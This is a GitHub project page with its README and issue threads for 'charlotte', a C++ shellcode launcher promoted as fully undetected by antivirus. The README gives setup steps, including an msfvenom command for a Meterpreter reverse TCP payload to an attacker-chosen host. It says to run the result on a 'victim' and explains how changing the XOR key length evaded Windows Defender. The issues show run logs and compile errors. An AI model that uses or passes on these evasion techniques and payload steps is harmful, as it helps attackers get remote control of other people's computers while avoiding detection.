C++ fully undetected shellcode launcher

Overview

charlotte

c++ fully undetected shellcode launcher ;)

releasing this to celebrate the birth of my newborn

description

13/05/2021:

  1. c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.
  2. dynamic invoking of win32 api functions
  3. XOR encryption of shellcode and function names
  4. randomised XOR keys and variables per run
  5. on Kali Linux, simply 'apt-get install mingw-w64*' and that's it!

17/05/2021:

  1. random strings length and XOR keys length

[antiscan.me scan result image]

usage

git clone the repository, generate your shellcode file named beacon.bin, and run charlotte.py

example:

  1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
  2. cd charlotte
  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
  4. python charlotte.py
  5. profit

tested with msfvenom -p (shown in the .gif POC below) and also with a Cobalt Strike raw-format payload

[POC .gif]

update v1.1

17/05/21:

apparently Microsoft Windows Defender was able to detect the .DLL binary. How did they flag it? By looking for several XOR keys of 16-byte size. Changing the key length to 9, as shown in the POC .gif below, makes it undetected again.

cheers!

[POC .gif]

Comments
  • Line 201 & 196

    [] Initialising charlotte() []
    [] Failed to read beacon.bin :( []
    [] Missing beacon.bin in pwd? []
    [] Generating XOR Keys... []
    [] charlotte() failed? :( []
    [] Completed - Compiling charlotte.dll []
    [] Cross Compile Success! []
    [] Removing charlotte.cpp... []
    rm: cannot remove 'charlotte.cpp': No such file or directory
    [] Execute on your Windows x64 victim with: []
    Traceback (most recent call last):
      File "charlotte.py", line 201, in
        main()
      File "charlotte.py", line 196, in main
        print("[] rundll32 charlotte.dll, " + e1 + " []")
    UnboundLocalError: local variable 'e1' referenced before assignment

    opened by alexp121 2
  • Consistent indentation, exit on critical error, binary read of beacon…

    Nice work on this, however I had a few issues running charlotte.py that are fixed in this PR.

    Summary of fixes:

    • Used env to find the python3 interpreter to use
    • Removed unused import for base64 module
    • Used consistent indentation to fix Python runtime errors I was experiencing
    • Read beacon file as binary to deal with cases where beacon contains byte values not in strings character set (utf-8 in my case)
    • Updated the xor function to accept both byte and str input
    • Script exits on fatal errors to make troubleshooting clearer
    opened by stephenbradshaw 1
  • key = get_random_string()

    Hello, thank you for the tool. When you change `key = get_random_string()` to `key = get_random_string(9)` or 16, this message appears: charlotte() failed? :(

    opened by majid-derkaoui 0
  • `getting flagged`

    hey, it is getting caught by windows defender:

    [Screenshot 2021-05-25 060818]

    windows version: Microsoft Windows [Version 10.0.18363.1379]

    security intelligence version: 1.339.1178.0

    what I used for shellcode: msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<> LPORT=<> -f raw > testing_charlotte.bin

    opened by ORCA666 0
  • error compiling charlotte.cpp

    Hi

    When trying to compile charlotte.cpp, I have the following error:

    x86_64-w64-mingw32-g++ -shared -o charlotte.dll charlotte.cpp -fpermissive
    charlotte.cpp:34:129: error: ‘__drv_aliasesMem’ has not been declared
    HANDLE (WINAPI * MqwXBhOA)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
                                                                                                                                    ^~~~~~~~~~~~~~~~
    charlotte.cpp:34:153: error: expected ‘,’ or ‘...’ before ‘lpParameter’
    HANDLE (WINAPI * MqwXBhOA)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);

    Do you have any idea?

    Thx for your help

    opened by kfr-ma 0
  • key = get_random_string(...)  _ charlotte() failed? :(

    hi, when I write 16 or 9 into `key = get_random_string(..here..)`, the "charlotte() failed? :(" message appears. When I leave it empty, the .dll file is created.

    thanks

    opened by srdrhzl 0
  • Crashes dll

    After running the dll file it crashes: "Windows host process (Rundll32) stopped working!" Machine architecture amd64 and payload msfvenom x64! Wonderful concept, nice work! It gets detected for now, like 5 from 28, but still good work!

    opened by Chomikmarkus 1